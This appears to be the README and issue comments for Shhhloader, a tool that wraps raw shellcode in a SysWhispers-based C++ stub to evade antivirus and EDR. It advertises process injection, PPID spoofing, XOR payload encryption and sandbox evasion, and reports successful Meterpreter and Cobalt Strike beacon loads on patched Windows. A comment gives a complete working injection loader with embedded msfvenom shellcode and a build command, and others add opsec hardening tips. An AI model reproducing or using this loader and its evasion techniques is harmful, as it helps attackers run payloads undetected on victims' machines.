SysWhispers Shellcode Loader

Shhhloader

Shhhloader is a SysWhispers shellcode loader that is currently a work in progress. It takes raw shellcode as input and compiles a C++ stub that has been integrated with SysWhispers in order to bypass AV/EDR. The included Python builder will work on any Linux system that has Mingw-w64 installed.

The tool has been confirmed to successfully load Meterpreter and a Cobalt Strike beacon on fully updated systems with Windows Defender enabled. The project itself is still in a PoC/WIP state, as it currently doesn't work with all payloads.

2/9/22 EDIT: Shhhloader now includes 5 different ways to execute your shellcode! See below for updated usage. Big thanks to @Snovvcrash and their DInjector project for inspiration! I highly recommend taking a look at it for more information regarding the shellcode injection techniques and code that this tool is now based on.

┳┻|
┻┳|
┳┻|
┻┳|
┳┻| _
┻┳| •.•)  - Shhhhh, AV might hear us! 
┳┻|⊂ノ   
┻┳|
usage: Shhhloader.py [-h] [-p explorer.exe] [-m QueueUserAPC] [-nr] [-v] [-d] [-o a.exe] file

ICYGUIDER'S CUSTOM SYSWHISPERS SHELLCODE LOADER

positional arguments:
  file                  File containing raw shellcode

optional arguments:
  -h, --help            show this help message and exit
  -p explorer.exe, --process explorer.exe
                        Process to inject into (Default: explorer.exe)
  -m QueueUserAPC, --method QueueUserAPC
                        Method for shellcode execution (Options: ProcessHollow, QueueUserAPC,
                        RemoteThreadContext, RemoteThreadSuspended, CurrentThread) (Default: QueueUserAPC)
  -nr, --no-randomize   Disable syscall name randomization
  -v, --verbose         Enable debugging messages upon execution
  -d, --dll-sandbox     Use DLL based sandbox checks instead of the standard ones
  -o a.exe, --outfile a.exe
                        Name of compiled file

Video Demo: https://www.youtube.com/watch?v=-KLGV_aGYbw

Features:

  • 5 Different Shellcode Execution Methods (ProcessHollow, QueueUserAPC, RemoteThreadContext, RemoteThreadSuspended, CurrentThread)
  • PPID Spoofing
  • Block 3rd Party DLLs
  • Syscall Name Randomization
  • XOR Encryption with Dynamic Key Generation
  • Sandbox Evasion via Loaded DLL Enumeration
  • Sandbox Evasion via Checking Processors, Memory, and Time

Tested and Confirmed Working on:

  • Windows 10 21H1 (10.0.19043)
  • Windows 10 20H2 (10.0.19042)
  • Windows Server 2019 (10.0.17763)

Scan Results as of 2/9/22 (x64 Meterpreter QueueUserAPC): https://antiscan.me/scan/new/result?id=tntuLnCkTCwz

Greetz & Credit:

Comments
  • Error FAILED to allocate memory in the current process, exiting: c000000d

    Hey. For me only ProcessHollow works as the shellcode execution method.

    For all the other methods I receive an error while running the generated exe.

    Generating:

    python Shhhloader.py  -p notepad.exe    Payload.raw   -v
    
    ┳┻|
    ┻┳|
    ┳┻|
    ┻┳|
    ┳┻| _
    ┻┳| •.•)  - Shhhhh, AV might hear us!
    ┳┻|⊂ノ
    ┻┳|
    [+] ICYGUIDER'S CUSTOM SYSWHISPERS SHELLCODE LOADER
    [+] Using notepad.exe for QueueUserAPC injection
    [+] Randomizing syscall names
    [+] Verbose messages enabled
    [+] Saved new stub to stub.cpp
    [+] Compiling new stub...
    [!] a.exe has been compiled successfully!
    

    Running:

    Please wait 60 seconds...
    Sandbox checks passed
    hiqPjIRXkVUORsAylux FAILED to allocate memory in the current process, exiting: c000000d
    

    :-(

    Injecting in explorer.exe or notepad.exe doesn't make a difference.

    Edit:

    I traced it down to the syscall to NtAllocateVirtualMemory. The return value is:

    RAX 00000000C000000D STATUS_INVALID_PARAMETER

    Please help!

  • CurrentThread

    Hi,

    So I managed to only get a Cobalt beacon back when using the CurrentThread method. I am not sure why the other methods are not working. If you can explain the steps to help you debug it, I will be happy to assist.

    OS Name: Microsoft Windows 10 Enterprise
    OS Version: 10.0.18363 N/A Build 18363

  • msfvenom alternatives [question]

    Hi @icyguider! Hope you are doing well. I am re-creating a tool like msfvenom using Python, and in the process I am dealing with some problems related to the design complexity of msfvenom. Do you have any suggestions for me on open-source stuff that would help me achieve such a task? I have already seen projects such as Veil or OWASP ZSC, but these tools are not active anymore. Cheers!

  • Recommendations

    Strip debug information from the binary for opsec and size reduction: x86_64-w64-mingw32-strip --strip-all

    Add skCrypter.h headers and wrap the key with skCrypt("key") so that it is not a plaintext string: https://github.com/skadro-official/skCrypter

  • Win7 SP1 or Windows Server 2008 test failed, can you help me?

    • OS: Windows 7 SP1
    //generate payload
    msfvenom -p windows/x64/exec cmd=calc.exe -f raw -o calc.bin
    //source code
    
    #define _WIN32_WINNT 0x0600
    #include <iostream>
    #include <windows.h>
    #include <psapi.h>
    #include <winternl.h>
    #include <tlhelp32.h>
    #include "Syscalls2.h"
    #ifndef UNICODE  
    typedef std::string String;
    #else
    typedef std::wstring String;
    #endif
    
    
    unsigned char shellcode[276] = {
    0xFC,0x48,0x83,0xE4,0xF0,0xE8,0xC0,0x00,
    0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
    0x56,0x48,0x31,0xD2,0x65,0x48,0x8B,0x52,
    0x60,0x48,0x8B,0x52,0x18,0x48,0x8B,0x52,
    0x20,0x48,0x8B,0x72,0x50,0x48,0x0F,0xB7,
    0x4A,0x4A,0x4D,0x31,0xC9,0x48,0x31,0xC0,
    0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0x41,
    0xC1,0xC9,0x0D,0x41,0x01,0xC1,0xE2,0xED,
    0x52,0x41,0x51,0x48,0x8B,0x52,0x20,0x8B,
    0x42,0x3C,0x48,0x01,0xD0,0x8B,0x80,0x88,
    0x00,0x00,0x00,0x48,0x85,0xC0,0x74,0x67,
    0x48,0x01,0xD0,0x50,0x8B,0x48,0x18,0x44,
    0x8B,0x40,0x20,0x49,0x01,0xD0,0xE3,0x56,
    0x48,0xFF,0xC9,0x41,0x8B,0x34,0x88,0x48,
    0x01,0xD6,0x4D,0x31,0xC9,0x48,0x31,0xC0,
    0xAC,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,
    0x38,0xE0,0x75,0xF1,0x4C,0x03,0x4C,0x24,
    0x08,0x45,0x39,0xD1,0x75,0xD8,0x58,0x44,
    0x8B,0x40,0x24,0x49,0x01,0xD0,0x66,0x41,
    0x8B,0x0C,0x48,0x44,0x8B,0x40,0x1C,0x49,
    0x01,0xD0,0x41,0x8B,0x04,0x88,0x48,0x01,
    0xD0,0x41,0x58,0x41,0x58,0x5E,0x59,0x5A,
    0x41,0x58,0x41,0x59,0x41,0x5A,0x48,0x83,
    0xEC,0x20,0x41,0x52,0xFF,0xE0,0x58,0x41,
    0x59,0x5A,0x48,0x8B,0x12,0xE9,0x57,0xFF,
    0xFF,0xFF,0x5D,0x48,0xBA,0x01,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x8D,
    0x01,0x01,0x00,0x00,0x41,0xBA,0x31,0x8B,
    0x6F,0x87,0xFF,0xD5,0xBB,0xF0,0xB5,0xA2,
    0x56,0x41,0xBA,0xA6,0x95,0xBD,0x9D,0xFF,
    0xD5,0x48,0x83,0xC4,0x28,0x3C,0x06,0x7C,
    0x0A,0x80,0xFB,0xE0,0x75,0x05,0xBB,0x47,
    0x13,0x72,0x6F,0x6A,0x00,0x59,0x41,0x89,
    0xDA,0xFF,0xD5,0x63,0x61,0x6C,0x63,0x2E,
    0x65,0x78,0x65,0x00,
    };
    
    int main()
    {
        
        HANDLE hProc = GetCurrentProcess();
        DWORD oldprotect = 0;
        PVOID base_addr = NULL;
        HANDLE thandle = NULL;
        SIZE_T bytesWritten;
        size_t shellcodeSize = sizeof(shellcode) / sizeof(shellcode[0])+1;
        NTSTATUS res = NtAllocateVirtualMemory(hProc, &base_addr, 0, (PSIZE_T)&shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (res != 0){
            std::cout << "NtAllocateVirtualMemory FAILED to allocate memory in the current process, exiting: " << std::hex << res << std::endl;
            return 0;
        }
        else {
            std::cout << "NtAllocateVirtualMemory allocated memory in the current process sucessfully." << std::endl;
        }
        res = NtWriteVirtualMemory(hProc, base_addr, shellcode, shellcodeSize, &bytesWritten);
        if (res != 0){
            std::cout << "NtWriteVirtualMemory FAILED to write decoded payload to allocated memory: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtWriteVirtualMemory wrote decoded payload to allocated memory successfully." << std::endl;
        }
        res = NtProtectVirtualMemory(hProc, &base_addr, (PSIZE_T)&shellcodeSize, PAGE_NOACCESS, &oldprotect);
        if (res != 0){
            std::cout << "NtProtectVirtualMemory FAILED to modify permissions: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtProtectVirtualMemory modified permissions successfully." << std::endl;
        }
        res = NtCreateThreadEx(&thandle, GENERIC_EXECUTE, NULL, hProc, base_addr, NULL, TRUE, 0, 0, 0, NULL);
    
        if (res != 0){
            std::cout << "NtCreateThreadEx FAILED to create thread in current process: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtCreateThreadEx created thread in current process successfully." << std::endl;
        }
        res = NtProtectVirtualMemory(hProc, &base_addr, (PSIZE_T)&shellcodeSize, PAGE_EXECUTE_READ, &oldprotect);
    
        if (res != 0){
            std::cout << "NtProtectVirtualMemory FAILED to modify permissions: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtProtectVirtualMemory modified permissions successfully." << std::endl;
        }
        res = NtResumeThread(thandle, 0);
        if (res != 0){
            std::cout << "NtResumeThread FAILED to resume created thread: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtResumeThread resumed created thread successfully." << std::endl;
        }
        res = NtWaitForSingleObject(thandle, -1, NULL);   
    }
    //build
    x86_64-w64-mingw32-g++ stub.cpp -w -masm=intel -fpermissive -static -lpsapi -Wl,--subsystem,console -o a.exe
    

    The test is successful on Win7 and above.

    The output on Win7 or Windows 2008 is as follows:

    NtAllocateVirtualMemory allocated memory in the current process sucessfully.
    NtWriteVirtualMemory wrote decoded payload to allocated memory successfully.
    NtProtectVirtualMemory modified permissions successfully.
    NtCreateThreadEx created thread in current process successfully.
    NtProtectVirtualMemory modified permissions successfully.
    NtResumeThread FAILED to resume created thread: c0000022
    